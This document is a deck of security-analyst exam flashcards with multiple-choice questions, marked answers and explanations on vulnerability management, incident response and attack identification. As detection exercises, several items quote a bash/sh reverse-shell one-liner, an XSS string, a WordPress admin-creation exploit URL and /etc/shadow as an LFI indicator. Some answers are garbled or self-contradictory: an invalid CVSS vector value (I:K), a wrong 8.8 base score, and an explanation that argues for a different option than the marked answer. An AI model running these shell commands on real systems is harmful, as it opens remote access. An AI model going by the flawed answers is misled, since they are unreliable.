Deck 1 Flashcards
A recent zero-day vulnerability is being actively exploited, requires no user interaction or privilege escalation, and has a significant impact to confidentiality and integrity but not to availability. Which of the following CVE metrics would be most accurate for this zero-day threat?
A. CVSS:31/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:K/A:L
B. CVSS:31/AV:K/AC:L/PR:H/UI:R/S:C/C:H/I:H/A:L
C. CVSS:31/AV:N/AC:L/PR:N/UI:H/S:U/C:L/I:N/A:H
D. CVSS:31/AV:L/AC:L/PR:R/UI:R/S:U/C:H/I:L/A:H
Correct Answer: A
A. CVSS:31/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:K/A:L
Attack Vector (AV): Network (AV:N)
Attack Complexity (AC): Low (AC:L)
Privileges Required (PR): None (PR:N)
User Interaction (UI): None (UI:N)
Scope (S): Unchanged (S:U)
Confidentiality Impact (C): High (C:H)
Integrity Impact (I): Known (I:K)
Availability Impact (A): Low (A:L)
Which of the following items should be included in a vulnerability scan report? (Choose two.)
A. Lessons learned
B. Service-level agreement
C. Playbook
D. Affected hosts
E. Risk score
F. Education plan
Correct Answer: D, E
D. Affected hosts: Definitely! This information helps pinpoint where vulnerabilities exist.
E. Risk score: Yes, including the risk score provides context on the severity of each vulnerability.
Items like “Lessons learned,” “Service-level agreement,” “Playbook,” and “Education plan” are not typically part of a vulnerability scan report. They might be relevant for other security documentation but aren’t directly related to scan results.
The Chief Executive Officer of an organization recently heard that exploitation of new attacks in the industry was happening approximately 45 days after a patch was released. Which of the following would best protect this organization?
A. A mean time to remediate of 30 days
B. A mean time to detect of 45 days
C. A mean time to respond of 15 days
D. Third-party application testing
Correct Answer: A
Response - Incident response activities include detection, analysis, containment, eradication, recovery, communication, and documentation.
Remediation - Remediation activities include applying patches, fixing misconfigurations, updating security policies, improving access controls, and implementing other corrective measures.
A company’s user accounts have been compromised. Users are also reporting that the company’s internal portal is sometimes only accessible through HTTP; other times, it is accessible through HTTPS. Which of the following most likely describes the observed activity?
A. There is an issue with the SSL certificate causing port 443 to become unavailable for HTTPS access
B. An on-path attack is being performed by someone with internal access that forces users into port 80
C. The web server cannot handle an increasing amount of HTTPS requests so it forwards users to port 80
D. An error was caused by BGP due to new rules applied over the company’s internal routers
Correct Answer: B
Based on the information provided, it seems that option B is the most likely scenario.
An on-path attack by an internal actor could be forcing users to connect via port 80 (HTTP) instead of port 443 (HTTPS). This manipulation could compromise security by intercepting or redirecting traffic. It’s essential for the company to investigate further and take appropriate measures to secure their network and user accounts.
A security analyst is tasked with prioritizing vulnerabilities for remediation. The relevant company security policies are shown below:
Security Policy 1006: Vulnerability Management
The Company shall use the CVSSv3.1 Base Score Metrics (Exploitability and Impact) to prioritize the remediation of security vulnerabilities.
In situations where a choice must be made between confidentiality and availability, the Company shall prioritize confidentiality of data over availability of systems and data.
The Company shall prioritize patching of publicly available systems and services over patching of internally available systems.
According to the security policy, which of the following vulnerabilities should be the highest priority to patch?
A. Name: THOR.HAMMER -
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H
Internal System
B. Name: CAP.SHIELD -
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
External System
C. Name: LOKI.DAGGER -
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H
External System
D. Name: THANOS.GAUNTLET -
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
Internal System
Correct Answer: B
CAP.SHIELD
Based on the security policy’s criteria, vulnerabilities B (CAP.SHIELD) and D (THANOS.GAUNTLET) have the highest priority in patching because they have the highest impact on confidentiality, which takes precedence over availability.
B. CAP.SHIELD - CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N (External System)
Exploitability: Low
Impact: High (Confidentiality)
Patching Priority: Highest
D. THANOS.GAUNTLET - CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N (Internal System)
Exploitability: Low
Impact: High (Confidentiality)
Patching Priority: Highest
According to the policy, external systems should be prioritized over internal systems.
Therefore, vulnerability B should be addressed first.
An incident response team receives an alert to start an investigation of an internet outage. The outage is preventing all users in multiple locations from accessing external SaaS resources. The team determines the organization was impacted by a DDoS attack. Which of the following logs should the team review first?
A. CDN
B. Vulnerability scanner
C. DNS
D. Web server
Correct Answer: C
Given that the organization was impacted by a DDoS attack, the team should review the DNS logs first. DNS (Domain Name System) logs can provide valuable information about the domain resolution process, including any unusual or malicious requests. Analyzing DNS logs can help identify patterns associated with the attack and provide insights into the source of the traffic. Once the DNS logs have been reviewed, the team can proceed to examine other relevant logs, such as web server logs or CDN logs, to further investigate the incident.
A malicious actor has gained access to an internal network by means of social engineering. The actor does not want to lose access in order to continue the attack. Which of the following best describes the stage of the Cyber Kill Chain that the threat actor is currently operating in?
A. Weaponization
B. Reconnaissance
C. Delivery
D. Exploitation
Correct Answer: D
The current stage of the Cyber Kill Chain that the threat actor is operating in is D. Exploitation. At this stage, the attacker has successfully exploited a vulnerability or weakness to gain unauthorized access to the network. Their goal is to maintain access and continue their attack.
An analyst is reviewing a vulnerability report and must make recommendations to the executive team. The analyst finds that most systems can be upgraded with a reboot resulting in a single downtime window. However, two of the critical systems cannot be upgraded due to a vendor appliance that the company does not have access to. Which of the following inhibitors to remediation do these systems and associated vulnerabilities best represent?
A. Proprietary systems
B. Legacy systems
C. Unsupported operating systems
D. Lack of maintenance windows
Correct Answer: A
The systems that cannot be upgraded due to a vendor appliance represent proprietary systems. These appliances are likely tightly integrated with the critical systems, making it difficult to apply updates or patches.
Unlike legacy systems, which are older but still supported, proprietary systems often lack the flexibility to accommodate standard upgrades.
Unsupported operating systems, on the other hand, refer to those that no longer receive security updates from their vendors.
The issue here seems to be the proprietary nature of the vendor appliance, hindering the necessary upgrades.
A security analyst received a malicious binary file to analyze. Which of the following is the best technique to perform the analysis?
A. Code analysis
B. Static analysis
C. Reverse engineering
D. Fuzzing
Correct Answer: B
Given the scenario, static analysis is often the first step. It allows the analyst to identify suspicious patterns, check for hardcoded credentials, and understand the binary’s behavior without executing it. If further investigation is needed, reverse engineering becomes valuable.
A company is implementing a vulnerability management program and moving from an on-premises environment to a hybrid IaaS cloud environment. Which of the following implications should be considered on the new hybrid environment?
A. The current scanners should be migrated to the cloud
B. Cloud-specific misconfigurations may not be detected by the current scanners
C. Existing vulnerability scanners cannot scan IaaS systems
D. Vulnerability scans on cloud environments should be performed from the cloud
Correct Answer: B
Cloud-Specific Misconfigurations: Traditional vulnerability scanners may not fully detect cloud-specific misconfigurations. Cloud environments have unique security challenges, such as misconfigured permissions, network settings, and storage access. Ensure your vulnerability management tools account for these cloud-specific issues.
Migration of Scanners: While migrating your current scanners to the cloud (Option A) is an option, it’s essential to evaluate whether they are optimized for cloud environments. Some scanners may need adjustments or replacements to effectively scan cloud resources.
Vulnerability Scans from the Cloud: Performing vulnerability scans directly from the cloud (Option D) is recommended. This approach ensures that scans originate within the same environment, providing accurate results and minimizing network latency.
Coverage for IaaS Systems: Existing vulnerability scanners can indeed scan IaaS systems (Option C).
However, ensure they are configured correctly to assess cloud-based infrastructure. Consider integrating cloud-native security tools for comprehensive coverage.
A company that has a geographically diverse workforce and dynamic IPs wants to implement a vulnerability scanning method with reduced network traffic. Which of the following would best meet this requirement?
A. External
B. Agent-based
C. Non-credentialed
D. Credentialed
Correct Answer: B
Reduced network traffic: Pre-installed agents reduce the need for frequent network scans, replacing them with event-driven or periodic scheduled scans.
No IP limitation: Agent-based scanning is not limited by IP, making it accessible even for assets using dynamic addressing or located off-site behind private subnets.
Geographically distributed environments: Agent-based scanning works well in widely distributed environments or with numerous remote employees.
A security analyst detects an exploit attempt containing the following command:
sh -i >& /dev/udp/10.1.1.1/4821 0>$l
Which of the following is being attempted?
A. RCE
B. Reverse shell
C. XSS
D. SQL injection
Correct Answer: B
sh -i: This part of the command invokes the Bourne shell (sh) with an interactive session (-i).
>& /dev/udp/10.1.1.1/4821: The >& redirects both standard output and standard error to the specified UDP address (10.1.1.1) and port (4821).
0>$l: This redirects standard input (0) to an undefined variable ($l).
In a reverse shell attack, the attacker sets up a listener on their machine (in this case, the UDP address 10.1.1.1), and the compromised system connects back to the attacker, allowing them to execute commands remotely.
A company is in the process of implementing a vulnerability management program, and there are concerns about granting the security team access to sensitive data. Which of the following scanning methods can be implemented to reduce the access to systems while providing the most accurate vulnerability scan results?
A. Credentialed network scanning
B. Passive scanning
C. Agent-based scanning
D. Dynamic scanning
Correct Answer: C
Agent-based scanning involves installing a lightweight software agent on each endpoint. These agents perform the vulnerability assessment locally on the device, thereby not requiring remote access to sensitive data. The results are then sent back to a centralized server for analysis.
Joe, a leading salesperson at an organization, has announced on social media that he is leaving his current role to start a new company that will compete with his current employer. Joe is soliciting his current employer’s customers. However, Joe has not resigned or discussed this with his current supervisor yet. Which of the following would be the best action for the incident response team to recommend?
A. Isolate Joe’s PC from the network
B. Reimage the PC based on standard operating procedures
C. Initiate a remote wipe of Joe’s PC using mobile device management
D. Perform no action until HR or legal counsel advises on next steps
Correct Answer: D
Legal Considerations: Joe’s actions may have legal implications, especially if he’s soliciting customers while still employed. It’s essential to consult with legal counsel to determine the appropriate course of action.
HR Involvement: HR should be informed promptly. They can guide the organization on how to handle the situation, including any necessary disciplinary actions or termination procedures.
Preserving Evidence: Isolating Joe’s PC or wiping it remotely could inadvertently destroy evidence that might be relevant in any future legal proceedings. It’s best to wait for professional advice.
Incident response should always be coordinated with legal and HR departments to ensure compliance and protect the organization’s interests.
A security analyst is trying to identify possible network addresses from different source networks belonging to the same company and region.
Which of the following shell script functions could help achieve the goal?
A. function w() { a=$(ping -c 1 $1 | awk -F "/" 'END{print $1}') && echo "$1 | $a"; }
B. function x() { b=$(traceroute -m 40 $1 | awk 'END{print $1}') && echo "$1 | $b"; }
C. function y() { dig $(dig -x $1 | grep PTR | tail -n 1 | awk -F ".in-addr" '{print $1}').origin.asn.cymru.com TXT +short; }
D. function z() { c=$(geoiplookup $1) && echo "$1 | $c"; }
Correct Answer: C
The shell script function that could help identify possible network addresses from different source networks belonging to the same company and region is function y. Here’s how it works:
function y() {
dig $(dig -x $1 | grep PTR | tail -n 1 | awk -F ".in-addr" '{print $1}').origin.asn.cymru.com TXT +short
}
This function takes an IP address as an argument and performs two DNS lookups using the dig command: a reverse (PTR) lookup of the address, followed by a TXT query to origin.asn.cymru.com built from that result. It retrieves information related to the address, including its origin and Autonomous System Number (ASN). The output provides valuable context for identifying network addresses within the same company and region.
A cybersecurity analyst notices unusual network scanning activity coming from a country that the company does not do business with. Which of the following is the best mitigation technique?
A. Geoblock the offending source country.
B. Block the IP range of the scans at the network firewall.
C. Perform a historical trend analysis and look for similar scanning activity.
D. Block the specific IP address of the scans at the network firewall.
Correct Answer: B
Given the situation, the best mitigation technique would be B. Block the IP range of the scans at the network firewall.
Geoblocking (option A) might seem like a straightforward solution, but it can have unintended consequences. Blocking an entire country could inadvertently affect legitimate traffic or hinder business operations if there are any legitimate connections from that country.
Blocking the specific IP address (option D) is reactive and may not prevent other scanners from using different IP addresses. It’s better to address the broader range of IPs involved in the scanning activity.
Performing historical trend analysis (option C) is valuable for understanding the context and identifying patterns, but it won’t immediately stop the ongoing scanning activity.
Blocking the IP range of the scans at the network firewall (option B) is a targeted approach. By doing so, you can prevent further scanning attempts from that specific range without affecting other legitimate traffic.
Remember that timely incident response and continuous monitoring are crucial in cybersecurity. Regularly reviewing logs, analyzing threat intelligence, and staying informed about emerging threats will help you proactively address security incidents.
An analyst has received an IPS event notification from the SIEM stating an IP address, which is known to be malicious, has attempted to exploit a zero-day vulnerability on several web servers. The exploit contained the following snippet:
/wp-json/trx_addons/V2/get/sc_layout?sc=wp_insert_user&role=administrator
Which of the following controls would work best to mitigate the attack represented by this snippet?
A. Limit user creation to administrators only.
B. Limit layout creation to administrators only.
C. Set the directory trx_addons to read only for all users.
D. Set the directory V2 to read only for all users.
Correct Answer: A
The snippet provided appears to be an attempt to exploit a WordPress vulnerability.
The /wp-json/trx_addons/V2/get/sc_layout part indicates an endpoint in the WordPress REST API.
The sc=wp_insert_user&role=administrator query parameters suggest an attempt to create a new user with the “administrator” role.
A. Limit user creation to administrators only:
This control restricts user creation to administrators, which is a good practice. While it won’t directly address the specific vulnerability in the snippet, it does mitigate the specific attack.
B. Limit layout creation to administrators only:
Layout creation doesn’t seem relevant to the snippet. It’s unlikely to mitigate the attack.
C. Set the directory trx_addons to read-only for all users:
This option is more specific to the vulnerability. If the trx_addons directory contains sensitive files or scripts, setting it to read-only could prevent unauthorized modifications, but making it read-only for all users would remove legitimate administrator write permissions as well.
D. Set the directory V2 to read-only for all users:
The V2 directory isn’t directly related to the snippet. Focusing on the trx_addons directory is more appropriate.
An employee accessed a website that caused a device to become infected with invasive malware. The incident response analyst has:
created the initial evidence log.
disabled the wireless adapter on the device.
interviewed the employee, who was unable to identify the website that was accessed.
reviewed the web proxy traffic logs.
Which of the following should the analyst do to remediate the infected device?
A. Update the system firmware and reimage the hardware.
B. Install an additional malware scanner that will send email alerts to the analyst.
C. Configure the system to use a proxy server for Internet access.
D. Delete the user profile and restore data from backup.
Correct Answer: A
Given the options, the most relevant action is C. Configure the system to use a proxy server for Internet access. This step can help monitor and filter traffic, preventing future infections.
To effectively remediate the infected device, the incident response analyst should follow these steps:
Isolate the Device: Disable network access for the infected endpoint to prevent lateral movement. This step helps contain the malware and prevent further spread.
Identify the Type, Scope, and Timeline of the Malware Infection: Understand the nature of the malware, its impact, and when it occurred. This information informs subsequent actions.
Create an Image of the Infected System: Before making any changes, create a forensic image of the compromised system. This preserves evidence for further analysis and legal purposes.
Remove the Malware (if possible): Use reliable malware scanning and detection tools to identify and remove the malicious software. Ensure that the removal process doesn’t inadvertently cause data loss or further damage.
Reset Credentials and Invalidate Sessions: Change passwords and usernames associated with the infected device. Invalidate any active web sessions to prevent unauthorized access.
Review Access to Impacted Applications: Assess which applications or services were accessed from the infected device. Close any potential entry points used by the malware.
Given the following CVSS string:
CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
Which of the following attributes correctly describes this vulnerability?
A. A user is required to exploit this vulnerability.
B. The vulnerability is network based.
C. The vulnerability does not affect confidentiality.
D. The complexity to exploit the vulnerability is high.
Correct Answer: B
The CVSS string provided corresponds to a vulnerability with the following attributes:
Base Score: 8.8 (High severity)
Attack Vector (AV): Network (AV:N)
Attack Complexity (AC): Low (AC:L)
Privileges Required (PR): None (PR:N)
User Interaction (UI): None (UI:N)
Scope (S): Unchanged (S:U)
Confidentiality Impact (C): High (C:H)
Integrity Impact (I): High (I:H)
Availability Impact (A): High (A:H)
B. The vulnerability is network based.
Option A is incorrect: Privileges Required (PR): None (PR:N)
Option C is incorrect: Confidentiality Impact (C): High (C:H)
Option D is incorrect: Attack Complexity (AC): Low (AC:L)
A virtual web server in a server pool was infected with malware after an analyst used the internet to research a system issue. After the server was rebuilt and added back into the server pool, users reported issues with the website, indicating the site could not be trusted. Which of the following is the most likely cause of the server issue?
A. The server was configured to use SSL to securely transmit data.
B. The server was supporting weak TLS protocols for client connections.
C. The malware infected all the web servers in the pool.
D. The digital certificate on the web server was self-signed.
Correct Answer: D
A. The server was configured to use SSL to securely transmit data.
While SSL (Secure Sockets Layer) is essential for secure data transmission, it doesn’t directly impact trust issues reported by users. SSL ensures encryption, but it doesn’t address trustworthiness concerns.
B. The server was supporting weak TLS protocols for client connections.
Weak TLS (Transport Layer Security) protocols can indeed affect trust. If the server supports outdated or insecure TLS versions (e.g., TLS 1.0 or 1.1), it could compromise security and lead to trust issues.
C. The malware infected all the web servers in the pool.
Malware could certainly cause trust issues, but it’s not necessarily the most likely cause. We need more evidence to confirm this.
D. The digital certificate on the web server was self-signed.
This is a strong possibility. Self-signed certificates are not issued by a trusted certificate authority (CA), leading to trust warnings in browsers. Users might perceive the site as untrustworthy due to the self-signed certificate.
Conclusion: The most likely cause of the trust issue is option D—the self-signed digital certificate on the web server.
A SOC analyst identifies the following content while examining the output of a debugger command over a client-server application:
getConnection(database01, "alpha", "AxTv.127GdCx94GTd");
Which of the following is the most likely vulnerability in this system?
A. Lack of input validation
B. SQL injection
C. Hard-coded credential
D. Buffer overflow
Correct Answer: C
The most likely vulnerability in this system is C. Hard-coded credential.
The presence of the hardcoded username (“alpha”) and password (“AxTv.127GdCx94GTd”) within the getConnection function call indicates that sensitive credentials are directly embedded in the code.
This practice poses a significant security risk, as anyone with access to the code can easily extract these credentials and potentially gain unauthorized access to the database.
To improve security, it’s essential to use secure credential management practices, such as storing credentials in a separate, encrypted configuration file or using environment variables.
Additionally, regular code reviews and vulnerability assessments can help identify and address such issues.
While reviewing web server logs, a security analyst found the following line:
<IMG SRC='vbscript:msgbox("test")'>
Which of the following malicious activities was attempted?
A. Command injection
B. XML injection
C. Server-side request forgery
D. Cross-site scripting
Correct Answer: D
The malicious activity attempted in this case is Cross-site scripting (XSS).
The provided line contains a script embedded within an image tag (<IMG SRC=...>), which executes VBScript code (msgbox("test")).
This code would display a message box with the text “test” when the image is loaded by a victim’s browser.
XSS attacks allow an attacker to inject malicious scripts into web pages viewed by other users, potentially compromising their data or executing unauthorized actions.
A security analyst discovers an LFI vulnerability that can be exploited to extract credentials from the underlying host. Which of the following patterns can the security analyst use to search the web server logs for evidence of exploitation of that particular vulnerability?
A. /etc/shadow
B. curl localhost
C. ; printenv
D. cat /proc/self/
Correct Answer: A
Local File Inclusion (LFI) is a web security vulnerability that occurs when an attacker tricks a web application into including files from the local server.
If an attacker successfully exploits an LFI vulnerability to extract credentials from the underlying host, one way they might attempt to access sensitive files is by trying to access the “/etc/shadow” file. The “/etc/shadow” file on Unix-based systems like Linux contains the hashed passwords of users.
A company is in the process of implementing a vulnerability management program. Which of the following scanning methods should be implemented to minimize the risk of OT/ICS devices malfunctioning due to the vulnerability identification process?
A. Non-credentialed scanning
B. Passive scanning
C. Agent-based scanning
D. Credentialed scanning
Correct Answer: B
Passive scanning is a method of vulnerability identification that does not send any packets or probes to the target devices, but rather observes and analyzes the network traffic passively. Passive scanning can minimize the risk of Operational Technology (OT)/Industrial Control Systems (ICS) devices malfunctioning due to the vulnerability identification process, as it does not interfere with the normal operation of the devices or cause any network disruption. Passive scanning can also detect vulnerabilities that active scanning may miss, such as misconfigured devices, rogue devices or unauthorized traffic.
An end-of-life date was announced for a widely used OS. A business-critical function is performed by some machinery that is controlled by a PC, which is utilizing the OS that is approaching the end-of-life date. Which of the following best describes a security analyst’s concern?
A. Any discovered vulnerabilities will not be remediated.
B. An outage of machinery would cost the organization money.
C. Support will not be available for the critical machinery.
D. There are no compensating controls in place for the OS.
Correct Answer: A
As an operating system reaches its end-of-life date, the vendor typically stops providing security updates and patches for known vulnerabilities.
This leaves systems running on the outdated OS exposed to potential security risks. Without the ability to receive patches, any vulnerabilities discovered in the OS after the end-of-life date will remain unaddressed, increasing the risk of exploitation by malicious actors. This concern highlights the importance of migrating critical systems to supported and up-to-date platforms to mitigate security risks.
While options B, C, and D may also be concerns for the organization, the primary focus of a security analyst is typically on mitigating security risks, making option A the best choice.
A security analyst identified the following suspicious entry on the host-based IDS logs:
bash -i >& /dev/tcp/10.1.2.3/8080 0>&1
Which of the following shell scripts should the analyst use to most accurately confirm if the activity is ongoing?
A. #!/bin/bash
nc 10.1.2.3 8080 -vv >/dev/null && echo "Malicious activity" || echo "OK"
B. #!/bin/bash
ps -fea | grep 8080 >/dev/null && echo "Malicious activity" || echo "OK"
C. #!/bin/bash
ls /opt/tcp/10.1.2.3/8080 >/dev/null && echo "Malicious activity" || echo "OK"
D. #!/bin/bash
netstat -antp | grep 8080 >/dev/null && echo "Malicious activity" || echo "OK"
Correct Answer: D
The suspicious entry bash -i >& /dev/tcp/10.1.2.3/8080 0>&1 appears to be an attempt to establish a reverse shell connection to the IP address 10.1.2.3 on port 8080.
Option A:
* This script uses nc (netcat) to connect to 10.1.2.3 on port 8080.
* If the connection is successful, it echoes “Malicious activity”; otherwise, it echoes “OK.”
* However, this script doesn’t directly verify the suspicious command.
* Not the best choice for confirming ongoing activity related to the suspicious entry.
Option B:
* This script uses ps -fea to list all processes and then pipes the output to grep 8080.
* If any process with port 8080 is found, it echoes “Malicious activity”; otherwise, it echoes “OK.”
* While it checks for processes, it doesn’t specifically validate the suspicious command.
* Not the most accurate choice for confirming ongoing activity related to the suspicious entry.
Option C:
* This script attempts to list the contents of a non-existent directory (/opt/tcp/10.1.2.3/8080).
* It will likely fail and always echo “OK.”
* Definitely not the right choice for confirming the suspicious activity.
Option D:
* This script uses netstat -antp to display active network connections.
* It then pipes the output to grep 8080 to check for any connections on port 8080.
* If a connection exists, it echoes “Malicious activity”; otherwise, it echoes “OK.”
* Best choice among the given options for confirming ongoing activity related to the suspicious entry.
Therefore, the security analyst should use Option D to accurately confirm whether the suspicious activity is ongoing. This script checks for active connections on port 8080, which aligns with the suspicious command.
Which of the following concepts is using an API to insert bulk access requests from a file into an identity management system an example of?
A. Command and control
B. Data enrichment
C. Automation
D. Single sign-on
Correct Answer: C
Using an API to insert bulk access requests from a file into an identity management system is an example of automation.
This process streamlines the creation of multiple access requests simultaneously, improving efficiency and accuracy.
Unlike single sign-on (D), which focuses on user authentication, automation (C) handles repetitive tasks programmatically.
Data enrichment (B) typically involves enhancing existing data with additional information, but it’s not directly related to bulk access requests.
And command and control (A) refers to a cyber threat tactic, not a system functionality.
So, the correct answer is C. Automation.
A company is concerned with finding sensitive file storage locations that are open to the public. The current internal cloud network is flat. Which of the following is the best solution to secure the network?
A. Implement segmentation with ACLs.
B. Configure logging and monitoring to the SIEM.
C. Deploy MFA to cloud storage locations.
D. Roll out an IDS.
Correct Answer: A
Segmentation with ACLs (Access Control Lists):
Segmentation involves dividing the flat network into smaller, isolated segments. Each segment can have its own security policies and access controls.
ACLs are rules that determine which traffic is allowed or denied between segments. By configuring ACLs, you can restrict communication between sensitive file storage locations and the public network.
This approach minimizes lateral movement within the network, reducing the attack surface and preventing unauthorized access.
ACLs can be applied at the network level (e.g., using firewalls) or at the host level (e.g., using security groups in cloud environments).
Other Options:
Logging and monitoring to the SIEM (Option B): While important for visibility, this alone won’t prevent unauthorized access. It helps detect incidents but doesn’t proactively secure the network.
Deploying MFA to cloud storage locations (Option C): MFA enhances authentication but doesn’t directly address network segmentation.
Rolling out an IDS (Option D): An Intrusion Detection System detects suspicious activity but doesn’t segment the network.
A security analyst must review a suspicious email to determine its legitimacy. Which of the following should be performed? (Choose two.)
A. Evaluate scoring fields, such as Spam Confidence Level and Bulk Complaint Level
B. Review the headers from the forwarded email
C. Examine the recipient address field
D. Review the Content-Type header
E. Evaluate the HELO or EHLO string of the connecting email server
F. Examine the SPF, DKIM, and DMARC fields from the original email
Correct Answer: A, F
Evaluate scoring fields (SCL and Bulk Complaint Level):
Correct: Checking the Spam Confidence Level (SCL) and Bulk Complaint Level is a valid step. These scores help assess the likelihood that an email is spam or malicious. A high SCL or numerous bulk complaints may indicate suspicious content.
Review email headers:
Not directly relevant: Because a forwarded email carries the forwarder's headers rather than the original ones, this step becomes less effective; the original headers are lost. When original headers are available, look for anomalies such as unusual IP addresses, domains, or inconsistencies in the Received headers.
Examine the recipient address field:
Not directly relevant: While it’s generally good practice to verify recipient addresses, this step alone may not determine the email’s legitimacy. It’s essential to consider other factors as well.
Review the Content-Type header:
Not directly relevant: The Content-Type header specifies the format of the email content (e.g., text, HTML). While it’s useful for rendering the email correctly, it doesn’t directly assess legitimacy.
Evaluate the HELO or EHLO string of the connecting email server:
Not directly relevant: The HELO/EHLO string is part of the SMTP handshake during email communication. While it can provide clues about the server, it’s not a primary step for assessing email legitimacy.
Examine the SPF, DKIM, and DMARC fields from the original email:
Correct: Checking SPF (Sender Policy Framework), DKIM (DomainKeys Identified Mail), and DMARC (Domain-based Message Authentication, Reporting, and Conformance) records helps verify the email’s legitimacy. These fields prevent email spoofing and enhance security.
Following a recent security incident, the Chief Information Security Officer is concerned with improving visibility and reporting of malicious actors in the environment. The goal is to reduce the time to prevent lateral movement and potential data exfiltration. Which of the following techniques will best achieve the improvement?
A. Mean time to detect
B. Mean time to respond
C. Mean time to remediate
D. Service-level agreement uptime
Correct Answer: A
To improve visibility and reduce the time to prevent lateral movement and data exfiltration, the most relevant technique is Mean Time to Detect (MTTD). MTTD measures how quickly an organization identifies security incidents or threats. By minimizing MTTD, you can detect malicious actors earlier, allowing for faster response and containment. The other options—Mean Time to Respond (MTTR), Mean Time to Remediate (MTTR), and Service-level Agreement (SLA) uptime—are important but focus on different aspects of incident management and resolution. MTTD directly addresses the goal of improving visibility and timely detection.
A security analyst discovers an ongoing ransomware attack while investigating a phishing email. The analyst downloads a copy of the file from the email and isolates the affected workstation from the network. Which of the following activities should the analyst perform next?
A. Wipe the computer and reinstall software
B. Shut down the email server and quarantine it from the network
C. Acquire a bit-level image of the affected workstation
D. Search for other mail users who have received the same file
Correct Answer: D
The analyst has already contained the original infected machine.
Next would be to identify the scope of the malware (how many users have been affected).
After the spread has been contained, the analyst can go back and acquire the bit-level image for further forensics.
After identifying a threat, a company has decided to implement a patch management program to remediate vulnerabilities. Which of the following risk management principles is the company exercising?
A. Transfer
B. Accept
C. Mitigate
D. Avoid
Correct Answer: C
The company is exercising the “Mitigate” risk management principle. By implementing a patch management program, they are taking steps to reduce the impact of vulnerabilities and mitigate the associated risks.
An incident response analyst is taking over an investigation from another analyst. The investigation has been going on for the past few days. Which of the following steps is most important during the transition between the two analysts?
A. Identify and discuss the lessons learned with the prior analyst.
B. Accept all findings and continue to investigate the next item target.
C. Review the steps that the previous analyst followed.
D. Validate the root cause from the prior analyst.
Correct Answer: C
During the transition between analysts, reviewing the steps that the previous analyst followed (Option C) is crucial. By understanding the investigation’s progress, you can build upon existing knowledge and avoid duplicating efforts. Additionally, this step ensures continuity and helps the new analyst identify any gaps or areas that need further exploration. Remember, effective communication with the prior analyst is essential for a smooth handover.
An organization enabled a SIEM rule to send an alert to a security analyst distribution list when ten failed logins occur within one minute. However, the control was unable to detect an attack with nine failed logins. Which of the following best represents what occurred?
A. False positive
B. True negative
C. False negative
D. True positive
Correct Answer: C
The SIEM rule indeed worked as expected by not triggering an alert at 9 failed login attempts. However, the issue lies in the threshold being set too high. Since the threshold was 10 failed logins within one minute, it failed to detect an actual attack when there were 9 failed logins. This situation is indeed a False Negative because the rule missed a legitimate security event.
A cybersecurity analyst is tasked with scanning a web application to understand where the scan will go and whether there are URLs that should be denied access prior to more in-depth scanning. Which of the following best fits the type of scanning activity requested?
A. Uncredentialed scan
B. Discovery scan
C. Vulnerability scan
D. Credentialed scan
Correct Answer: B
A discovery scan is typically used to identify the scope of a web application and understand where the scan will go. This type of scan is often the first step in assessing a web application’s security and helps the analyst determine which areas should be further examined or tested in-depth.
Which of the following risk management principles is accomplished by purchasing cyber insurance?
A. Accept
B. Avoid
C. Mitigate
D. Transfer
Correct Answer: D
Purchasing cyber insurance aligns with the risk management principle of transferring risk. By obtaining cyber insurance, organizations shift the financial burden of potential losses resulting from cyber incidents to the insurance provider. This allows them to mitigate the impact of breaches or data loss.
A recent audit of the vulnerability management program outlined the finding for increased awareness of secure coding practices. Which of the following would be best to address the finding?
A. Establish quarterly SDLC training on the top vulnerabilities for developers
B. Conduct a yearly inspection of the code repositories and provide the report to management.
C. Hire an external penetration test of the network
D. Deploy more vulnerability scanners for increased coverage
Correct Answer: A
To address the finding of increased awareness of secure coding practices, I recommend option A: Establish quarterly SDLC training on the top vulnerabilities for developers. This approach ensures that developers receive regular training and stay informed about the latest security threats and best practices. By integrating secure coding principles into their workflow, they can proactively prevent vulnerabilities in the code they write.
The other options (B, C, and D) are valuable but may not directly address the need for ongoing developer education.
An organization has deployed a cloud-based storage system for shared data that is in phase two of the data life cycle. Which of the following controls should the security team ensure are addressed? (Choose two.)
A. Data classification
B. Data destruction
C. Data loss prevention
D. Encryption
E. Backups
F. Access controls
Correct Answer: D, F
Encryption (D): Relevant during data storage and usage phases. It ensures data confidentiality by converting it into a secure format that only authorized parties can decipher.
Access Controls (F): Crucial for data storage. Access controls limit who can access, modify, or delete data. Properly configured permissions prevent unauthorized access.
Data Life Cycle:
1. Create
2. Storage
3. Usage
4. Sharing
5. Archive
6. Destruction
Data Classification – Create (1)
Data Destruction – Destruction (6)
Data Loss Prevention – Usage (3), Share (4)
Encryption – Storage (2), Usage (3)
Backups – Archive (5)
Access Controls – Storage (2)
A Chief Information Security Officer wants to map all the attack vectors that the company faces each day. Which of the following recommendations should the company align their security controls around?
A. OSSTMM
B. Diamond Model of Intrusion Analysis
C. OWASP
D. MITRE ATT&CK
Correct Answer: D
The company should align their security controls around D. MITRE ATT&CK (Adversarial Tactics, Techniques, and Common Knowledge).
The MITRE ATT&CK framework is a powerful tool for Chief Information Security Officers (CISOs) to map all the attack vectors that the company faces each day.
It categorizes and details various adversary tactics and techniques based on real-world threat intelligence observations.
By revealing adversary tactics, techniques, and procedures (TTPs), MITRE ATT&CK empowers CISOs and their security teams to make informed, proactive decisions when addressing cyberthreats.
An analyst is conducting routine vulnerability assessments on the company infrastructure. When performing these scans, a business-critical server crashes, and the cause is traced back to the vulnerability scanner. Which of the following is the cause of this issue?
A. The scanner is running without an agent installed.
B. The scanner is running in active mode.
C. The scanner is segmented improperly.
D. The scanner is configured with a scanning window.
Correct Answer: B
Active scans (Option B) can sometimes overload or disrupt target systems, especially if they are not configured or managed properly. In some cases, active scans can trigger vulnerabilities or cause service disruptions, leading to unexpected issues like a server crash.
